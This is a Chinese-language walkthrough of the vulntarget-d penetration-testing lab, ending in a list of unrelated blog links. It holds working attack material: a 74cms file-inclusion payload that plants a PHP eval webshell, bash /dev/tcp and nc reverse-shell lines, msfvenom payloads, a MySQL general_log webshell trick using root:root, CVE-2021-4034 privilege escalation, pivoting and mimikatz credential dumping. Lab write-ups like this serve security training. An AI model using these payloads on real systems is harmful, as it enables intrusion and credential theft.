vulntarget-d

配置信息

系统 ip
kali 192.168.130.5
ubuntu 18 ip1: 192.168.130.8 ip2: 10.0.10.1
win7 10.0.10.134

网卡修改

ubuntu如果配置上双网卡没显示就如下操作:

// 修改配置文件

sudo vim /etc/network/interfaces

// 之后重启网络

sudo /etc/init.d/networking restart

文件内如下,也可以改成了静态的ip,这个随意。

最后用列出所有网卡查看修改的情况, 网卡配置完成。

实战

web打点

信息收集

发现了3306的MySQL有未授权,然后8888有个登录。

用fscan扫一下,发现8888那有个登录入口一眼宝塔, 81有个骑士cms。

在网页底部找到他的版本信息v6.0.20就可以去搜索历史漏洞。

骑士cms文件包含

去网上搜了利用的文章,先用post写入一句话。

variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

然后开始包含日志文件,日志文件要和当天的日期一致。

variable=1&tpl=data/Runtime/Logs/Home/23_08_21.log

这里有个点,当写的文件名是shell.php的时候会被宝塔给拦截了但是去Ubuntu里面看确实是写入了,这里直接换个文件名就ok的。

内网渗透

Ubuntu提权

连上哥斯拉上来丝滑三连发现第二个网段,转战msf进行提权。

本来想偷懒直接用哥斯拉反弹过去的,但是效果不好一下就会断掉。

老老实实传msf上去。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.130.5 LPORT=6666 -f elf > 110.elf

handler -p linux/x86/meterpreter/reverse_tcp -H 192.168.130.5 -P 6666

下载提权脚本来看看入手点,但是很奇怪赋权之后执行了报错。先在msf这里挂个提权模块待会等结果。

run post/multi/recon/local_exploit_suggester

在哥斯拉里面试了一下发现了报错,出现这个原因一般是函数被ban了。

按前面的步骤写一个phpinfo(),可以看到被ban的还挺多的。

看了一下它上面有vim,然后也找到了php.ini可以试着改一手,先反弹shell过去。

bash -i >& /dev/tcp/192.168.130.5/9999 0>&1

有python环境升级交互式shell,定位到php.ini。

但是是真离谱进不了命令行模式进行移动,esc, Ctrl + [, Ctrl+o都不行,Ctrl+c就直接断了。

完全交互式shell

搜到一个升级到完全交互式shell的方法,先用这种方式反弹shell。然后还是正常的升级交互式shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.105 6667 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")';

接着设置环境变量, Ctrl+z将shell发送到后台, 设置 shell 以通过反向 shell 发送控制字符和其他原始输入。使用以下stty命令来执行此操作。之后再输入reset。

export TERM=xterm    // 允许clear

Ctrl + z

stty raw -echo;fg

reset

然后此时就可以正常进入普通模式和命令模式,找到disable_functions的地方。

我真的服辣我是**。

回过头去看了一下msf的结果,有个cve-2021-4034

找到一个exp提权成功,exp传送门 GayHub - 全球最大 同性交友网站

流量转发

再运行之前的子上线msf,再创建路由入段(没找到chisel就寄希望于msf的socks试试)。

run autoroute -s 10.0.10.0/24

run autoroute -p

不成不成,太容易断了最后还是挂上frp,但是配置proxychains让fscan开扫扫不到一个?但是使用他内置的flag可以正常扫到。

这里可以看到除开本机和10.0.10.3, 就是10.0.10.2存活。

根据结果得知10.0.10.2是Win7,其他指纹信息没有什么有用的。

root@kali ~/Desktop » ./fscan_amd64 -h 10.0.10.1-128 -socks5 192.168.130.5:1515     

   ___                              _

  / _ \     ___  ___ _ __ __ _  ___| | __

 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /

/ /_\\_____\__ \ (__| | | (_| | (__|   <

\____/     |___/\___|_|  \__,_|\___|_|\_\

                     fscan version: 1.8.2

Socks5Proxy: socks5://192.168.130.5:1515

start infoscan

10.0.10.2:80 open

10.0.10.3:80 open

10.0.10.3:81 open

10.0.10.2:135 open

10.0.10.1:135 open

10.0.10.2:139 open

10.0.10.2:445 open

10.0.10.2:3306 open

10.0.10.3:3306 open

10.0.10.3:8080 open

10.0.10.3:888 open

10.0.10.3:1080 open

10.0.10.1:8082 open

10.0.10.3:8888 open

[*] alive ports len is: 14

start vulscan

[*] WebTitle: http://10.0.10.3          code:200 len:1326   title:没有找到站点

[*] NetInfo:

[*]10.0.10.1

   [->]Lockly

   [->]172.31.224.1

   [->]192.168.130.1

   [->]10.0.10.1

   [->]192.168.43.233

   [->]240e:468:f2f3:21c0:32c5:5ebe:ccd1:1d9

   [->]240e:468:f2f3:21c0:c9f6:cb76:c5d6:839d

[*] WebTitle: http://10.0.10.2          code:200 len:11     title:None

[*] WebTitle: http://10.0.10.3:8080     code:404 len:9      title:None

[*] 10.0.10.2  (Windows 7 Ultimate 7601 Service Pack 1)

[*] WebTitle: http://10.0.10.3:888      code:404 len:548    title:404 Not Found

[*] WebTitle: http://10.0.10.3:81       code:200 len:127210 title:骑士PHP高端人才系统(www.74cms.com)

[*] WebTitle: http://10.0.10.3:8888     code:302 len:219    title:Redirecting... 跳转url: http://10.0.10.3:8888/login

[*] NetInfo:

[*]10.0.10.2

   [->]WIN-D4S86JO2R26

   [->]10.0.10.2

[*] WebTitle: http://10.0.10.1:8082     code:400 len:18     title:None

已完成 14/14

[*] 扫描结束,耗时: 4m45.627909432s

这里奇怪的就是proxychains firefox是能正常访问到10.0.10.2他的站点的,但是挂给工具扫就是没用

真是鬼来了dirb和dirsearch走proxychains又是正常的,nmap,fscan一概扫不到。dirb结果有一个php探针和phpmyadin的登录页面。

除开这两个然后在dirb中还有一个l.php。

这个l.php是个php探针,底下连接数据库那里弱口令root:root一尝试就出来了。

全局日志写入一句话

查看全局日志是否开启,这里的原始位置可以留个记录,后续写完之后复原日志善始善终,但是这里显示有点问题我就没负责了。

SHOW GLOBAL VARIABLES LIKE '%general%';

开启全局日志,之后查看一下确认开了就OK。

SET GLOBAL GENERAL_LOG=ON;

SET GLOBAL GENERAL_LOG_FILE = 'C:/phpstudy/PHPTutorial/www/t.php';

将子写入日志。

select '<?php eval($_POST["hi"]);?>'

可以访问到t.php,连接上就没问题。

免杀上线

发现里面有火绒,要考虑做一下免杀。

免杀有时效性就没记录了,这台机器不出网,所以要用正向马。然后上传免杀之后,开启监听拿到了会话。

handler -p windows/meterpreter/bind_tcp -H 10.0.10.2 -P 4444

后续的图忘了截了,将进程迁移到64位上。用mimikatz抓密码,3389上才艺上去一眼就能看到flag。

vulntarget-d-wp的更多相关文章

  1. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  2. wp已死,metro是罪魁祸首!

    1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...

  3. 关于 WP 开发中.xaml 与.xaml.cs 的关系

    今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...

  4. Android,ios,WP三大手机系统对比

    从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...

  5. 搜狗输入法wp风格皮肤

    换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...

  6. 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19

    上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...

  7. 【WP开发】读写剪贴板

    在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...

  8. 【WP开发】不同客户端之间传输加密数据

    在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...

  9. 【WP开发】加密篇:双向加密

    说起双向加密,如果以前在.NET开发中弄过加/解密的朋友都不会陌生,常用的算法有DES.AES等.在RT应用程序中,也提供了加密相关的API,算法自然是一样的,只是API的封装方式不同罢了,因为RT不 ...

  10. 【WP 8.1开发】How to 图像处理

    在今天的吹牛节目开始之前,先交代一件事: 关于玩WP 8.1开发所使用的VS版本问题.对版本的要求是2013的Update2,这是最低要求,只要是这个版本或以上都可以,而update3,update4 ...

随机推荐

  1. 每日一库:lumberjack -- 日志轮换和管理

    在开发应用程序时,记录日志是一项关键的任务,以便在应用程序运行时追踪问题.监视性能和保留审计记录.Go 语言提供了灵活且强大的日志记录功能,可以通过多种方式配置和使用.其中一个常用的日志记录库是 gi ...

  2. Java爬虫实战系列2——动手写爬虫初体验

    在上面的章节中,我们介绍了几个目前比较活跃的Java爬虫框架.在今天的章节中,我们会参考开源爬虫框架,开发我们自己的Java爬虫软件. 首先,我们下载本章节要使用到的源代码,本章节主要提供了基于HTT ...

  3. 彻底弄懂ip掩码中的网络地址、广播地址、主机地址

    本文为博主原创,转载请注明出处: 概念理解: IP掩码(或子网掩码)用于确定一个IP地址的网络部分和主机部分.它是一个32位的二进制数字,与IP地址做逻辑与运算,将IP地址划分为网络地址和主机地址两部 ...

  4. tiptop查询通配符

    *:表示任何符合的字符,例:A*,表示要找出全部为 A 开头的资料. ?:表示任一符合的字符,例:A?,表示要找出第一码为 A,第二码为任何 字符,但总共只有二码之数据. 注:以上二功能仅可在文字字段 ...

  5. 报Bug的礼仪

    不要对1个程序员说:你的代码有Bug.他的第1反应是:1.你的环境有问题吧:2.傻逼你会用吗? 如果你委婉的说:你这个程序和预期的有点不1致,你看看是不是我的打开姿势有问题?他本能的会想:擦,是不是出 ...

  6. Composite 组合模式简介与 C# 示例【结构型3】【设计模式来了_8】

    〇.简介 1.什么是组合设计模式? 一句话解释:   针对树形结构的任意节点,都实现了同一接口,他们具有相同的操作,可以通过某一操作来遍历全部节点. 组合模式通过使用树形结构来组合对象,用来表示部分以 ...

  7. 关于如何解决visualc++6.0打开文件闪退的一种方式(附带解决输入法无法显示)

    这里我把VisualC++6.0安装程序和filetool分享在我的网盘里面了 网盘下载QAQ 链接:https://pan.baidu.com/s/1azSMX_cOKgb64WT7-gTdbQ?p ...

  8. ResNet详解:网络结构解读与PyTorch实现教程

    本文深入探讨了深度残差网络(ResNet)的核心概念和架构组成.我们从深度学习和梯度消失问题入手,逐一解析了残差块.初始卷积层.残差块组.全局平均池化和全连接层的作用和优点.文章还包含使用PyTorc ...

  9. C++常见算法&数据结构模版

    各种常见算法 & 数据结构模板 1. 最长不下降子序列(LIS) 1.1 \(O(n^2)\) 做法 点击查看代码 for (int i = 1;i <= n;i++) { cin &g ...

  10. 记录jdk17相对于jdk8增加的一下主要语法糖和新特性

    jdk17 发布已经好久了,作为java的长期支持版本,引入了许多有趣且实用的新特性.这些特性不仅提高了开发效率,还增强了语言的表现力和安全性.并且是SpringBoot 3.0以后版本的硬性要求,之 ...